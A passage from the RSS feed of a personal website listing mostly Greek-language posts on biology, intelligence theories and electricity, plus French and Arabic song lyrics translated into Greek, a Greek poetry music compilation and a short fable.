We have to make it clear that by saying the &#34;smallest genome&#34; we mean the smallest genome of a free-living organism. Because there are virus or even prokaryotes with extremely small genomes, but these organisms live as obligate endosymbionts or obligate parasites. That is, they depend heavily on their host to support their vital functions and, therefore, a lot of their genes have been lost due to lack of necessity (or maybe they did not have many of those genes in the first place).</description>
    </item>
    
    <item>
      <title>Entomopathogenic fungi (available in greek only)</title>
      <link>https://alamot.github.io/entomopathogenic_fungi/</link>
      <pubDate>Mon, 22 Nov 2010 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/entomopathogenic_fungi/</guid>
      <description>Εισαγωγή Ένας εντομοπαθογόνος μύκητας είναι ένας μύκητας που λειτουργεί ως παράσιτο των εντόμων. Στις περισσότερες περιπτώσεις η προσβολή έχει ως αποτέλεσμα το θάνατο ή τη σοβαρή βλάβη του εντόμου ξενιστή. Πρόκειται δηλαδή για, ως επί το πλείστον, νεκροτροφικά παράσιτα.
Agostino Bassi
(1773-1856)  Ο Ιταλός βιολόγος Agostino Bassi (de Lodi), συγγενής και μαθητής του Lazzaro Spallanzani, θεωρείται ως ο πρώτος που έδειξε πειραματικά ότι μια ασθένεια προκαλείται από έναν μικροοργανισμό όταν, το 1835, μόλυνε μεταξοσκώληκες (Bombyx mori) με τον εντομοπαθογόνο μύκητα Beauveria bassiana.</description>
    </item>
    
    <item>
      <title>Intraspecific and Interspecific competition (available in greek only)</title>
      <link>https://alamot.github.io/intraspecific_and_interspecific_competition/</link>
      <pubDate>Wed, 17 Nov 2010 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/intraspecific_and_interspecific_competition/</guid>
      <description>Βασικοί μηχανισμοί ανταγωνισμού Μπορούμε να διακρίνουμε τον ανταγωνισμό σε δύο βασικούς μηχανισμούς:
α) στον ανταγωνισμό εκμετάλλευσης ή κατανάλωσης (exploitation ή consumptive competition), στις περιπτώσεις που η αλληλεπίδραση μεταξύ των ανταγωνιζόμενων ατόμων είναι έμμεση, και αφορά απλά στη μείωση της διαθεσιμότητας ενός πόρου λόγω της χρήσης του από τα υπόλοιπα άτομα του πληθυσμού.
β) στον ανταγωνισμό παρεμβολής (interference competition), όπου υπάρχει άμεση αλληλεπίδραση των ατόμων, δηλαδή ένα άτομο προλαβαίνει ένα άλλο στην κατάκτηση και την εκμετάλλευση των πόρων, με αποτέλεσμα να απαγορεύει στο άλλο την πρόσβαση στους αναζητούμενους πόρους ή να παρεμβαίνει δυσμενώς στην ανάπτυξή του.</description>
    </item>
    
    <item>
      <title>Theories of intelligence (available in greek only)</title>
      <link>https://alamot.github.io/theories_of_intelligence/</link>
      <pubDate>Tue, 01 Jun 2010 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/theories_of_intelligence/</guid>
      <description>Εισαγωγή Τι είναι νοημοσύνη; Είναι εξαιρετικά δύσκολο να την ορίσει κανείς. Οι περισσότεροι ορισμοί που της έχουν δοθεί κατά καιρούς περιορίζονται απλά στο να περιγράφουν τα αποτελέσματά της. Θα μπορούσαμε ίσως να πούμε ότι πρόκειται για μια πολύπλοκη νοητική λειτουργία που αξιοποιεί ερεθίσματα και παλαιότερες εμπειρίες με στόχο την προσαρμογή σε νέες καταστάσεις ή τη δημιουργία νέων επιτευγμάτων. Ένα ακόμη βασικό ερώτημα είναι αν η νοημοσύνη έχει πνευματική ή υλική υπόσταση; Προκύπτει από την αλληλεπίδραση της ύλης με βάση τους νόμους της φυσικής; Αν ναι πως γίνεται αυτό; Είναι σε θέση ο άνθρωπος να κατασκευάσει νοημοσύνη; Το κείμενο που ακολουθεί αποτελεί μια συνοπτική παρουσίαση των πιο σημαντικών θεωριών νοημοσύνης των τελευταίων ετών (σημείωση: εδώ ο όρος &amp;ldquo;θεωρία&amp;rdquo; χρησιμοποιείται περισσότερο με την έννοια του &amp;ldquo;μοντέλου-υπόθεση&amp;rdquo;).</description>
    </item>
    
    <item>
      <title>Microvilli (available in greek only)</title>
      <link>https://alamot.github.io/microvilli/</link>
      <pubDate>Fri, 08 Jan 2010 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/microvilli/</guid>
      <description>Εισαγωγή Οι μικρολάχνες (microvilli, ενικός: microvillus) είναι μικροσκοπικές δακτυλιοειδείς προεκβολές της κυτταρικής μεμβράνης που αυξάνουν την επιφάνειά της και εμπλέκονται σε πληθώρα λειτουργιών όπως είναι:
 η μεταφορά (απορρόφηση/έκκριση) ουσιών (π.χ. επιθηλιακά κύτταρα εντέρου, ηπατοκύτταρα, κύτταρα στο εγγύς εσπειραμένο σωληνάριο των νεφρών, επιθηλιακά κύτταρα επιδιδυμίδας) η υποδοχή ερεθισμάτων (π.χ. κύτταρα του οσφρητικού επιθήλιου, κύτταρα των γευστικών καλύκων, οι «στερεοβλεφαρίδες» στα τριχωτά κύτταρα του οργάνου του Corti στο αυτί) η κυτταρική προσκόλληση (π.</description>
    </item>
    
    <item>
      <title>Electric current and human body (available in greek only)</title>
      <link>https://alamot.github.io/electric_current_and_human_body/</link>
      <pubDate>Mon, 01 Jun 2009 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/electric_current_and_human_body/</guid>
      <description>Βασικές έννοιες του ηλεκτρισμού Για να εξετάσουμε τις επιπτώσεις του ηλεκτρικού ρεύματος στο ανθρώπινο σώμα είναι αναγκαίο να γνωρίζουμε κάποιες βασικές έννοιες και αρχές του ηλεκτρισμού.
Ηλεκτρικό ρεύμα ονομάζουμε το φαινόμενο της ροής ηλεκτρικού φορτίου. Το μέγεθος με το οποίο μετράμε αυτό το φαινόμενο είναι η ένταση του ηλεκτρικού ρεύματος που ορίζεται ως ο ρυθμός ροής ηλεκτρικού φορτίου από μια περιοχή σε άλλη διαμέσου μίας δεδομένης επιφάνειας:
$$I=\frac{dQ}{dt}$$ Σε έναν αγωγό, η ένταση του ρεύματος εξαρτάται από την ταχύτητα μετακίνησης των φορτισμένων σωματιδίων, τη συγκέντρωσή τους και το φορτίο τους.</description>
    </item>
    
    <item>
      <title>French songs with greek subtitles</title>
      <link>https://alamot.github.io/music_fr2el_subs/</link>
      <pubDate>Fri, 08 May 2009 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/music_fr2el_subs/</guid>
      <description>Anne-Marie David - Je suis l&amp;rsquo;enfant-soleil The french participation in the Eurovision Song Contest 1979 (Lyrics: Hubert Giraud, Music: Eddy Marnay)
Η συμμετοχή της Γαλλίας στην Eurovision του 1979 (Στίχοι: Hubert Giraud, Μουσική: Eddy Marnay)
   &amp;nbsp;
   Français Ελληνικά     &amp;nbsp; &amp;nbsp;   Il est arrivé du nord et moi, j&amp;rsquo;étais une enfant-soleil Ήρθε από το βορρά, κι εγώ ήμουν ένα παιδί-ήλιος   Il a dit des mots plus forts et plus doux que le coton du ciel Είπε λόγια πιο δυνατά και πιο γλυκά από το βελούδο του ουρανού   Il a partagé le pain et mon père lui a donné un lit Μοιράστηκε το ψωμί κι ο πατέρας μου του &amp;lsquo;δωσε ένα κρεβάτι   &amp;ldquo;Tu commenceras demain, près du chêne gris&amp;rdquo; &amp;ldquo;Αρχίζεις αύριο, κοντά στην γκρίζα βελανιδιά&amp;rdquo;   &amp;nbsp; &amp;nbsp;   Je n&amp;rsquo;ai pas rêvé de lui, je ne dormais pas Δεν τον ονειρεύτηκα, δεν κοιμόμουν   Etendue au pied du chêne gris, je guettais son pas Τεντωμένη στη βάση της γκρίζας βελανιδιάς, καρτερούσα το βήμα του   Et tout un hiver brûlant, notre amour a fait chanter la terre Κι έναν ολόκληρο παθιασμένο χειμώνα, η αγάπη μας έκανε τη γη να τραγουδάει   Comme un recommencement, comme une prière Όπως μια νέα αρχή, όπως μία προσευχή   &amp;nbsp; &amp;nbsp;   Il était un homme-neige, et moi, j&amp;rsquo;étais une enfant-soleil Ήταν ένας άνδρας-χιόνι κι εγώ ήμουν ένα παιδί-ήλιος   Le printemps sur son manège déroulait pour nous ses arcs-en-ciel Η άνοιξη πάνω στο καρουζέλ της ξετύλιγε για μας τα ουράνια τόξα της   S&amp;rsquo;il avait voulu partir, je n&amp;rsquo;aurais même pas su pleurer Αν είχε θελήσει να φύγει, δε θα ήξερα ούτε πως να κλάψω   J&amp;rsquo;aurais gardé le sourire qu&amp;rsquo;il m&amp;rsquo;avait donné Θα είχα κρατήσει το χαμόγελο που μου είχε δώσει   &amp;nbsp; &amp;nbsp;   Quand des hommes sont venus, je n&amp;rsquo;ai pas compris Όταν ήρθαν κάποιοι άνδρες, δεν κατάλαβα   Au-devant de moi il a couru, vers le chêne gris Έτρεξε μπροστά μου, προς την γκρίζα βελανιδιά   Mais sans qu&amp;rsquo;il ait rien pu faire, le piège s&amp;rsquo;était fermé sur lui Αλλά δεν υπήρχε τίποτα που να μπορούσε να κάνει, η παγίδα είχε κλείσει γύρω του   Ils ont remercié mon père, puis ils sont partis Ευχαρίστησαν τον πατέρα μου, έπειτα φύγαν   &amp;nbsp; &amp;nbsp;   Il est retourné au nord, et moi, j&amp;rsquo;étais une enfant-soleil Επέστρεψε στον βορρά, κι εγώ ήμουν το παιδί-ήλιος   Il avait ses mains dehors et sur son dos le coton du ciel Είχε τα χέρια του έξω και πάνω στην πλάτη του το βελούδο του ουρανού   Il a partagé le pain et mon père lui a donné un lit Μοιράστηκε το ψωμί κι ο πατέρας μου του &amp;lsquo;δωσε ένα κρεβάτι   Ce jour-là me paraît loin, près du chêne gris Εκείνη η μέρα μου φαίνεται μακριά, δίπλα στην γκρίζα βελανιδιά   &amp;nbsp; &amp;nbsp;   Hé, reviens, je suis l&amp;rsquo;enfant-soleil (x2) Εεε, γύρνα, είμαι το παιδί-ήλιος (x2)   Soleil, soleil Ήλιος, ήλιος.</description>
    </item>
    
    <item>
      <title>Greek poetry set to music</title>
      <link>https://alamot.github.io/music_greek_poetry/</link>
      <pubDate>Thu, 28 Aug 2008 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/music_greek_poetry/</guid>
      <description>This video was made by me in 2008. It is a collection of extracts of greek poems set to music by various greek artists.
Αυτό το βίντεο είναι μια συλλογή από κομμάτια ελληνικής μελλοποιημένης ποίησης που είχα ανθολογήσει το 2008.
   It contains extracts of the following songs: Περιλαμβάνει αποσπάσματα από τα εξής κομμάτια:
 Magic De Spell - Gala (Θα γλεντήσω κι εγώ μια νύχτα) [Στίχοι: Κώστας Καρυωτάκης, Μουσική: Γιώργος Σκαρλάτος] Νίκος Ξυλούρης - Η μπαλάντα του κυρ Μέντιου [Στίχοι: Κώστας Βάρναλης, Μουσική: Λουκάς Θάνος] Κώστας Καραλής - Ιδανικός κι ανάξιος εραστής [Στίχοι: Νίκος Καββαδίας, Μουσική: Γιάννης Σπανός] Μαρία Φαραντούρη - Ένα το χελιδόνι [Στίχοι: Οδυσσέας Ελύτης, Μουσική: Μίκης Θεοδωράκης] Διάφανα Κρίνα - Μέρες Αργίας [Στίχοι: Διονύσης Καψάλης] Ενδελέχεια - Αν νοσταλγώ [Στίχοι: Κώστας Ουράνης] Ελευθερία Αρβανιτάκη - Σαπφώ [Στίχοι: Σαπφώ, Νεοελληνική απόδοση: Σωτήρης Κακίσης, Μουσική: Δημήτρης Παπαδημητρίου] Κώστας Καραλής - Σπασμένο Καράβι [Στίχοι: Γίαννης Σκαρίμπας, Μουσική: Γιάννης Σπανός] Δημήτρης Ζερβουδάκης - Γράμμα σ&amp;rsquo;εναν ποιητή [Στίχοι: Νίκος Καββαδίας, Μουσική: Δημήτρης Ζερβουδάκης] Υπόγεια Ρεύματα - Ανδρείκελα [Στίχοι: Κώστας Καρυωτάκης]  </description>
    </item>
    
    <item>
      <title>Arabic songs with greek subtitles</title>
      <link>https://alamot.github.io/music_ar2el_subs/</link>
      <pubDate>Thu, 26 Jun 2008 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/music_ar2el_subs/</guid>
      <description>Haifa Wehbe - Nar El Ashwa    &amp;nbsp;
   Haifa Wehbe - Nar El Ashwa     &amp;nbsp;   Αχ, οι νύχτες   Πώς με άφησαν να ποθώ   Πώς έφεραν μαρτύριο   Και αναστεναγμούς στο μυαλό μου   &amp;nbsp;   Η καρδιά μου είναι θλιμμένη, αγάπη μου,   Από την απουσία σου   Με άφησες μόνη μου   Και τα μάτια μου είναι άγρυπνα   &amp;nbsp;   Η φωτιά του πόθου   Από την απόσταση του χωρισμού   Φωνάζει για σένα   Και η καρδιά μου σε αναζητά   &amp;nbsp;   Άφησε με και φύγε   Ω, ψυχή της ψυχής μου   Ποιός θα σταματήσει το μαρτύριο   Της πληγωμένης μου καρδιάς;   &amp;nbsp;   Αχ, αγάπη μου,   Πού είναι η πίστη σου;   Μάτια μου, πονάω,   Δε κοιμάμαι   &amp;nbsp;   Τράβηξε με κοντά στη καρδιά σου   και δως μου ζεστασιά.</description>
    </item>
    
    <item>
      <title>Brucellosis (available in greek only)</title>
      <link>https://alamot.github.io/brucellosis/</link>
      <pubDate>Sun, 21 Mar 2004 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/brucellosis/</guid>
      <description>Εισαγωγή Η βρουκέλλωση (γνωστή επίσης και με τα ονόματα «μελιταίος πυρετός» ή «πυρετός της Μάλτας» ή «πυρετός του Γιβραλτάρ» ή «πυρετός της Κύπρου» ή «πυρετός της Μεσογείου» ή «κυματοειδής πυρετός του Bang») είναι μια ζωονόσος που οφείλεται στις βρουκέλλες.
Οι βρουκέλλες είναι βακτηρίδια, αρκετά ανθεκτικά, που μπορούν να ζήσουν από 4 εώς 10 εβδομάδες στα γαλακτοκομικά προϊόντα, στο νερό και στην κοπριά. Είναι παθογόνα τόσο για τον άνθρωπο όσο και για τα ζώα.</description>
    </item>
    
    <item>
      <title>Χελωνολαγομαχίες (available in greek only)</title>
      <link>https://alamot.github.io/xelwnolagomaxies/</link>
      <pubDate>Wed, 12 Feb 2003 00:00:00 +0000</pubDate>
      
      <guid>https://alamot.github.io/xelwnolagomaxies/</guid>
      <description>Μια φορά κι έναν καιρό σε κάποιο δάσος &amp;hellip; Αχ! Επιτέλους, άνοιξη! Η αγαπημένη μου εποχή. Ήμουν πολύ καιρό κλεισμένη στο σπίτι μου (το οποίο κουβαλάω πάντα μαζί μου, από φόβο μη μου το κλέψουν), περιμένοντας πως και πως, πότε θα φτιάξει ο καιρός για να κάνω κανένα περίπατο στο δάσος, να ξεμουδιάσω λιγάκι. Δε λέω&amp;hellip; καλός κι ο ύπνος, αλλά βαρετός. Τώρα που το σκέφτομαι, κάτι έπρεπε να κάνω, αλλά το ξέχασα.</description>
    </item>
    
  </channel>
</rss>